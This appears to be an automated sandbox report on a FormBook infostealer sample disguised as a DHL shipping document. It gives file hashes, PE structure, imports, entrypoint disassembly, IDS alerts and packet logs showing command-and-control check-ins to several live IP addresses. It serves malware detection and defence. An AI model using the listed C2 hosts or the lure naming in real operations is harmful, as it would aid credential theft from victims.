	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94

Process:	C:\Windows\SysWOW64\netbtugc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	modified
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\caulds

Download File

Process:	C:\Users\user\Desktop\DHL-DOC83972025-1.exe
File Type:	data
Category:	modified
Size (bytes):	270848
Entropy (8bit):	7.9944233683993255
Encrypted:	true
SSDEEP:	6144:mp7b3VQWNz3vJAZorKNr5mrokuFNu9cVb+ZFfR:w7b3VpDyrUD9cVb0FfR
MD5:	559232A01A7F2DC45906D2A31C2D63BE
SHA1:	E476FA0AEC2EE7A2BDF404DF75237B297A0197BC
SHA-256:	C2FF189CA3D1198F89930DBB148FC88C62299A18EE24975899C31D5194355CCF
SHA-512:	D50168DAAFF954F56F55774BE29228E1F57F0B80F16A331DA415DD3BC32586240E2D419A0A3FA470FDED2F49C7678C7B20EA7D13929072A6E457BC312D83722F
Malicious:	false
Reputation:	low
Preview:	y....SXKL..Q...s.6R..mS[..K5SXKLMOFXJANKOX6Q1ALEPS4YVK5S.KLMAY.DA.B.y.P}.m.8:Gy&9Z4**!m,'6$.:k-=.#D/l,>sp..kX<<.b@BL\|JANKOX6(0H.x04.d6,.n8,.W..p!).U....!+.J...j+R.."/%r&?.ANKOX6Q1..EP.5XV.]..KLMOFXJA.KMY=P:ALUTS4YVK5SXK.XOFXZANKo\6Q1.LE@S4YTK5UXKLMOFXLANKOX6Q1aHEPQ4YVK5SZK..OFHJA^KOX6A1A\EPS4YV[5SXKLMOFXJANKOX6Q1ALEPS4YVK5SXKLMOFXJANKOX6Q1ALEPS4YVK5SXKLMOFXJANKOX6Q1ALEPS4YVK5SXKLMOFXJANKOX6Q1ALEPS4YVK5SXKLMOFXJANKOX6Q1ALEPS.-33ASXK.BKFXZANK_\6Q!ALEPS4YVK5SXKLmOF8JANKOX6Q1ALEPS4YVK5SXKLMOFXJANKOX6Q1ALEPS4YVK5SXKLMOFXJANKOX6Q1ALEPS4YVK5SXKLMOFXJANKOX6Q1ALEPS4YVK5SXKLMOFXJANKOX6Q1ALEPS4YVK5SXKLMOFXJANKOX6Q1ALEPS4YVK5SXKLMOFXJANKOX6Q1ALEPS4YVK5SXKLMOFXJANKOX6Q1ALEPS4YVK5SXKLMOFXJANKOX6Q1ALEPS4YVK5SXKLMOFXJANKOX6Q1ALEPS4YVK5SXKLMOFXJANKOX6Q1ALEPS4YVK5SXKLMOFXJANKOX6Q1ALEPS4YVK5SXKLMOFXJANKOX6Q1ALEPS4YVK5SXKLMOFXJANKOX6Q1ALEPS4YVK5SXKLMOFXJANKOX6Q1ALEPS4YVK5SXKLMOFXJANKOX6Q1ALEPS4YVK5SXKLMOFXJANKOX6Q1ALEPS4YVK5SXKLMOFXJANKOX6Q1ALEPS4YVK5SXKLMOFXJANKOX6Q1ALEPS4YVK5SXKLMOFXJANKOX6Q1ALEPS4

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.399094869030728
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DHL-DOC83972025-1.exe
File size:	1'579'008 bytes
MD5:	7e709c914c89cd047067dfdae9f83195
SHA1:	00cec0a619ed36ba2824b3aac06d71ca59003b95
SHA256:	ee47f75a94b6f25b076969a64bfca3004babe7f00faad7da76ef683bbf0f6b39
SHA512:	3feb24539f7321ef32df6e4644512f0bf36380a0c3095d10d870e67bde9d22ee031e9635d4d9dcf48361d8d2023e785fcff2031abd30280a5ed0692762192110
SSDEEP:	24576:GqDEvCTbMWu7rQYlBQcBiT6rprG8a1nG3gCzlpFUzXa5LxdtCOMuLKOJASTptv1t:GTvC/MTQYxsWR7a1GQCz1KgdtCmGoT9
TLSH:	F775D0027391D022FF9B92734B6AF6115BBC79260123EA1F13981DB9BD701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x677F1A2F [Thu Jan 9 00:37:03 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007F58B51E1C23h
jmp 00007F58B51E152Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F58B51E170Dh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F58B51E16DAh
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F58B51E42CDh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F58B51E4318h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F58B51E4301h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0xaac24	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x17f000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0xaac24	0xaae00	91861a911ef4f611768807e34d14deeb	False	0.961361843910022	data	7.959891958456126	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x17f000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0xa1eec	data			1.0003181179478828
RT_GROUP_ICON	0x17e6a4	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x17e71c	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x17e730	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x17e744	0x14	data	English	Great Britain	1.25
RT_VERSION	0x17e758	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x17e834	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-09T09:41:41.876273+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	61204	154.215.72.110	80	TCP
2025-01-09T09:42:13.833137+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	61292	116.50.37.244	80	TCP
2025-01-09T09:43:35.511136+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	61296	85.159.66.93	80	TCP
2025-01-09T09:43:48.877195+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	61300	91.195.240.94	80	TCP
2025-01-09T09:44:10.472792+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	61304	66.29.149.46	80	TCP
2025-01-09T09:44:23.862634+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	61308	195.110.124.133	80	TCP
2025-01-09T09:44:53.483406+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.7	61312	217.196.55.202	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 09:41:36.683295012 CET	61174	53	192.168.2.7	1.1.1.1
Jan 9, 2025 09:41:36.688172102 CET	53	61174	1.1.1.1	192.168.2.7
Jan 9, 2025 09:41:36.688256025 CET	61174	53	192.168.2.7	1.1.1.1
Jan 9, 2025 09:41:36.688319921 CET	61174	53	192.168.2.7	1.1.1.1
Jan 9, 2025 09:41:36.693093061 CET	53	61174	1.1.1.1	192.168.2.7
Jan 9, 2025 09:41:40.872210026 CET	53	61174	1.1.1.1	192.168.2.7
Jan 9, 2025 09:41:40.901638985 CET	61174	53	192.168.2.7	1.1.1.1
Jan 9, 2025 09:41:40.906697989 CET	53	61174	1.1.1.1	192.168.2.7
Jan 9, 2025 09:41:40.906743050 CET	61174	53	192.168.2.7	1.1.1.1
Jan 9, 2025 09:41:40.993376017 CET	61204	80	192.168.2.7	154.215.72.110
Jan 9, 2025 09:41:40.998174906 CET	80	61204	154.215.72.110	192.168.2.7
Jan 9, 2025 09:41:40.998236895 CET	61204	80	192.168.2.7	154.215.72.110
Jan 9, 2025 09:41:41.001033068 CET	61204	80	192.168.2.7	154.215.72.110
Jan 9, 2025 09:41:41.006249905 CET	80	61204	154.215.72.110	192.168.2.7
Jan 9, 2025 09:41:41.875983000 CET	80	61204	154.215.72.110	192.168.2.7
Jan 9, 2025 09:41:41.876096010 CET	80	61204	154.215.72.110	192.168.2.7
Jan 9, 2025 09:41:41.876272917 CET	61204	80	192.168.2.7	154.215.72.110
Jan 9, 2025 09:41:41.879461050 CET	61204	80	192.168.2.7	154.215.72.110
Jan 9, 2025 09:41:41.884283066 CET	80	61204	154.215.72.110	192.168.2.7
Jan 9, 2025 09:42:05.358465910 CET	61289	80	192.168.2.7	116.50.37.244
Jan 9, 2025 09:42:05.363332033 CET	80	61289	116.50.37.244	192.168.2.7
Jan 9, 2025 09:42:05.363492012 CET	61289	80	192.168.2.7	116.50.37.244
Jan 9, 2025 09:42:05.365175962 CET	61289	80	192.168.2.7	116.50.37.244
Jan 9, 2025 09:42:05.370033026 CET	80	61289	116.50.37.244	192.168.2.7
Jan 9, 2025 09:42:06.250606060 CET	80	61289	116.50.37.244	192.168.2.7
Jan 9, 2025 09:42:06.250628948 CET	80	61289	116.50.37.244	192.168.2.7
Jan 9, 2025 09:42:06.250682116 CET	61289	80	192.168.2.7	116.50.37.244
Jan 9, 2025 09:42:06.879496098 CET	61289	80	192.168.2.7	116.50.37.244
Jan 9, 2025 09:42:07.898027897 CET	61290	80	192.168.2.7	116.50.37.244
Jan 9, 2025 09:42:07.902967930 CET	80	61290	116.50.37.244	192.168.2.7
Jan 9, 2025 09:42:07.903034925 CET	61290	80	192.168.2.7	116.50.37.244
Jan 9, 2025 09:42:07.904731035 CET	61290	80	192.168.2.7	116.50.37.244
Jan 9, 2025 09:42:07.909518957 CET	80	61290	116.50.37.244	192.168.2.7
Jan 9, 2025 09:42:08.803138971 CET	80	61290	116.50.37.244	192.168.2.7
Jan 9, 2025 09:42:08.803160906 CET	80	61290	116.50.37.244	192.168.2.7
Jan 9, 2025 09:42:08.803231955 CET	61290	80	192.168.2.7	116.50.37.244
Jan 9, 2025 09:42:09.410877943 CET	61290	80	192.168.2.7	116.50.37.244
Jan 9, 2025 09:42:10.428999901 CET	61291	80	192.168.2.7	116.50.37.244
Jan 9, 2025 09:42:10.433967113 CET	80	61291	116.50.37.244	192.168.2.7
Jan 9, 2025 09:42:10.434060097 CET	61291	80	192.168.2.7	116.50.37.244
Jan 9, 2025 09:42:10.435543060 CET	61291	80	192.168.2.7	116.50.37.244
Jan 9, 2025 09:42:10.440326929 CET	80	61291	116.50.37.244	192.168.2.7
Jan 9, 2025 09:42:10.440429926 CET	80	61291	116.50.37.244	192.168.2.7
Jan 9, 2025 09:42:11.317135096 CET	80	61291	116.50.37.244	192.168.2.7
Jan 9, 2025 09:42:11.317169905 CET	80	61291	116.50.37.244	192.168.2.7
Jan 9, 2025 09:42:11.317220926 CET	61291	80	192.168.2.7	116.50.37.244
Jan 9, 2025 09:42:11.942018032 CET	61291	80	192.168.2.7	116.50.37.244
Jan 9, 2025 09:42:12.959897995 CET	61292	80	192.168.2.7	116.50.37.244
Jan 9, 2025 09:42:12.964873075 CET	80	61292	116.50.37.244	192.168.2.7
Jan 9, 2025 09:42:12.964951992 CET	61292	80	192.168.2.7	116.50.37.244
Jan 9, 2025 09:42:12.966685057 CET	61292	80	192.168.2.7	116.50.37.244
Jan 9, 2025 09:42:12.971544981 CET	80	61292	116.50.37.244	192.168.2.7
Jan 9, 2025 09:42:13.832950115 CET	80	61292	116.50.37.244	192.168.2.7
Jan 9, 2025 09:42:13.832974911 CET	80	61292	116.50.37.244	192.168.2.7
Jan 9, 2025 09:42:13.833137035 CET	61292	80	192.168.2.7	116.50.37.244
Jan 9, 2025 09:42:13.835890055 CET	61292	80	192.168.2.7	116.50.37.244
Jan 9, 2025 09:42:13.840672970 CET	80	61292	116.50.37.244	192.168.2.7
Jan 9, 2025 09:42:27.114722013 CET	61293	80	192.168.2.7	85.159.66.93
Jan 9, 2025 09:42:27.119662046 CET	80	61293	85.159.66.93	192.168.2.7
Jan 9, 2025 09:42:27.119739056 CET	61293	80	192.168.2.7	85.159.66.93
Jan 9, 2025 09:42:27.161689043 CET	61293	80	192.168.2.7	85.159.66.93
Jan 9, 2025 09:42:27.166615009 CET	80	61293	85.159.66.93	192.168.2.7
Jan 9, 2025 09:42:28.676362038 CET	61293	80	192.168.2.7	85.159.66.93
Jan 9, 2025 09:42:28.681754112 CET	80	61293	85.159.66.93	192.168.2.7
